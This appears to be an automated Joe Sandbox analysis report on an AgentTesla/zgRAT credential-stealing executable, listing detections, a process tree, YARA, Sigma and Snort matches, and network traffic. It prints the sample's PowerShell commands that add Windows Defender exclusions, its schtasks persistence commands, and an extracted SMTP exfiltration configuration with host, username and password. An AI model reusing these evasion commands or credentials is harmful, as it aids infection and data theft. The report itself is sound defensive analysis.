Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TTRef06022301.exe

Overview

General Information

Sample Name:TTRef06022301.exe
Analysis ID:803161
MD5:5478729e3225d4f158f811d03a8d4945
SHA1:e0dc6b437e0597da471e18d2ee55d412a7e5cf1a
SHA256:bfd2500b6963725aa9252fed8eb549a976ca73c9317746c40e5eb406641eae17
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • TTRef06022301.exe (PID: 796 cmdline: C:\Users\user\Desktop\TTRef06022301.exe MD5: 5478729E3225D4F158F811D03A8D4945)
    • powershell.exe (PID: 6044 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1008 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5636 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • TTRef06022301.exe (PID: 5996 cmdline: C:\Users\user\Desktop\TTRef06022301.exe MD5: 5478729E3225D4F158F811D03A8D4945)
  • iJyzakGsXF.exe (PID: 1752 cmdline: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe MD5: 5478729E3225D4F158F811D03A8D4945)
    • schtasks.exe (PID: 4876 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • iJyzakGsXF.exe (PID: 3824 cmdline: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe MD5: 5478729E3225D4F158F811D03A8D4945)
    • iJyzakGsXF.exe (PID: 3696 cmdline: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe MD5: 5478729E3225D4F158F811D03A8D4945)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "mail.keefort.com.ec", "Username": "ssg@keefort.com.ec", "Password": "u=Wa6eChU3nj      "}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: TTRef06022301.exe PID: 5996JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.TTRef06022301.exe.3986f10.11.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.TTRef06022301.exe.3986f10.11.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
              • 0xa680f:$s1: file:///
              • 0x12b42f:$s1: file:///
              • 0xa671f:$s2: {11111-22222-10009-11112}
              • 0x12b33f:$s2: {11111-22222-10009-11112}
              • 0xa679f:$s3: {11111-22222-50001-00000}
              • 0x12b3bf:$s3: {11111-22222-50001-00000}
              • 0xa3432:$s4: get_Module
              • 0x128052:$s4: get_Module
              • 0x24c84:$s5: Reverse
              • 0x4dca4:$s5: Reverse
              • 0xa38a6:$s5: Reverse
              • 0x1284c6:$s5: Reverse
              • 0x26307:$s6: BlockCopy
              • 0x4f327:$s6: BlockCopy
              • 0xa6010:$s6: BlockCopy
              • 0x12ac30:$s6: BlockCopy
              • 0x24e2a:$s7: ReadByte
              • 0x4de4a:$s7: ReadByte
              • 0xa6821:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
              • 0x12b441:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
              0.2.TTRef06022301.exe.395dcf0.8.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                0.2.TTRef06022301.exe.395dcf0.8.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                • 0xcfa2f:$s1: file:///
                • 0x15464f:$s1: file:///
                • 0xcf93f:$s2: {11111-22222-10009-11112}
                • 0x15455f:$s2: {11111-22222-10009-11112}
                • 0xcf9bf:$s3: {11111-22222-50001-00000}
                • 0x1545df:$s3: {11111-22222-50001-00000}
                • 0xcc652:$s4: get_Module
                • 0x151272:$s4: get_Module
                • 0x24c84:$s5: Reverse
                • 0x4dea4:$s5: Reverse
                • 0x76ec4:$s5: Reverse
                • 0xccac6:$s5: Reverse
                • 0x1516e6:$s5: Reverse
                • 0x26307:$s6: BlockCopy
                • 0x4f527:$s6: BlockCopy
                • 0x78547:$s6: BlockCopy
                • 0xcf230:$s6: BlockCopy
                • 0x153e50:$s6: BlockCopy
                • 0x24e2a:$s7: ReadByte
                • 0x4e04a:$s7: ReadByte
                • 0x7706a:$s7: ReadByte
                0.2.TTRef06022301.exe.39308d0.9.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\TTRef06022301.exe, ParentImage: C:\Users\user\Desktop\TTRef06022301.exe, ParentProcessId: 796, ParentProcessName: TTRef06022301.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp, ProcessId: 5636, ProcessName: schtasks.exe

                  Snort Signatures

                  Timestamp:192.168.2.788.99.90.21497165872030171 02/09/23-19:40:35.012308
                  SID:2030171
                  Source Port:49716
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.788.99.90.21497215872030171 02/09/23-19:40:59.212357
                  SID:2030171
                  Source Port:49721
                  Destination Port:587
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: TTRef06022301.exeVirustotal: Detection: 66%Perma Link
                  Source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.keefort.com.ec", "Username": "ssg@keefort.com.ec", "Password": "u=Wa6eChU3nj "}
                  Source: TTRef06022301.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.7:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.7:49718 version: TLS 1.2
                  Source: TTRef06022301.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: vEfr.pdbSHA256+J${ source: TTRef06022301.exe, iJyzakGsXF.exe.0.dr
                  Source: Binary string: vEfr.pdb source: TTRef06022301.exe, iJyzakGsXF.exe.0.dr

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.7:49716 -> 88.99.90.21:587
                  Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.7:49721 -> 88.99.90.21:587
                  May check the online IP address of the machine
                  Source: C:\Users\user\Desktop\TTRef06022301.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\Desktop\TTRef06022301.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\Desktop\TTRef06022301.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\Desktop\TTRef06022301.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\Desktop\TTRef06022301.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\Desktop\TTRef06022301.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeDNS query: name: api.ipify.org
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeDNS query: name: api.ipify.org
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewIP Address: 88.99.90.21 88.99.90.21
                  Source: Joe Sandbox ViewIP Address: 104.237.62.211 104.237.62.211
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficTCP traffic: 192.168.2.7:49716 -> 88.99.90.21:587
                  Source: global trafficTCP traffic: 192.168.2.7:49716 -> 88.99.90.21:587
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: TTRef06022301.exe, 00000008.00000003.282832205.0000000001089000.00000004.00000020.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.502249400.0000000001095000.00000004.00000020.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000003.336831683.0000000001240000.00000004.00000020.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.501452553.0000000001242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: TTRef06022301.exe, 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://keefort.com.ec
                  Source: TTRef06022301.exe, 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.keefort.com.ec
                  Source: TTRef06022301.exe, 00000000.00000002.273699340.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000007.00000002.319999505.0000000002551000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000007.00000002.319999505.0000000002743000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: unknownDNS traffic detected: queries for: api.ipify.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.7:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.7:49718 version: TLS 1.2
                  Source: iJyzakGsXF.exe, 00000007.00000002.317156647.00000000008C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.TTRef06022301.exe.3986f10.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 0.2.TTRef06022301.exe.39308d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: TTRef06022301.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.TTRef06022301.exe.3986f10.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.TTRef06022301.exe.39308d0.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_00ABFB800_2_00ABFB80
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_00ABEBA00_2_00ABEBA0
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_00ABEB900_2_00ABEB90
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_00ABD16C0_2_00ABD16C
                  Source: C:\Users\user\Desktop\TTRef06022301.exeCode function: 0_2_027C015C0_2_027C015C
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeCode function: 7_2_008BEB907_2_008BEB90
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeCode function: 7_2_008BEBA07_2_008BEBA0
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeCode function: 7_2_008BD16C7_2_008BD16C
                  Source: TTRef06022301.exe, 00000000.00000002.273699340.0000000002C15000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.273699340.0000000002C2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000000.232892755.0000000000274000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevEfr.exe> vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameB4000.dll> vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename48864580-1a97-4cef-8774-55508fd4d5f6.exe4 vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.279783604.0000000003930000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename48864580-1a97-4cef-8774-55508fd4d5f6.exe4 vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.279783604.0000000003930000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHIVacSim.dll2 vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.288231981.0000000006DE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHIVacSim.dll2 vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.284216822.0000000004DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameB4000.dll> vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000000.00000002.273699340.0000000002C46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000008.00000002.502249400.0000000000FB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000008.00000002.501213513.00000000009B8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs TTRef06022301.exe
                  Source: TTRef06022301.exe, 00000008.00000002.500438204.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename48864580-1a97-4cef-8774-55508fd4d5f6.exe4 vs TTRef06022301.exe
                  Source: TTRef06022301.exeBinary or memory string: OriginalFilenamevEfr.exe> vs TTRef06022301.exe
                  Source: TTRef06022301.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: iJyzakGsXF.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: TTRef06022301.exeVirustotal: Detection: 66%
                  Source: C:\Users\user\Desktop\TTRef06022301.exeFile read: C:\Users\user\Desktop\TTRef06022301.exeJump to behavior
                  Source: TTRef06022301.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\TTRef06022301.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\TTRef06022301.exe C:\Users\user\Desktop\TTRef06022301.exe
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                  Source: C:\Users\user\Desktop\TTRef06022301.exeProcess created: C:\Users\user\Desktop\TTRef06022301.exe C:\Users\user\Desktop\TTRef06022301.exe
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmp
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exeProcess created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
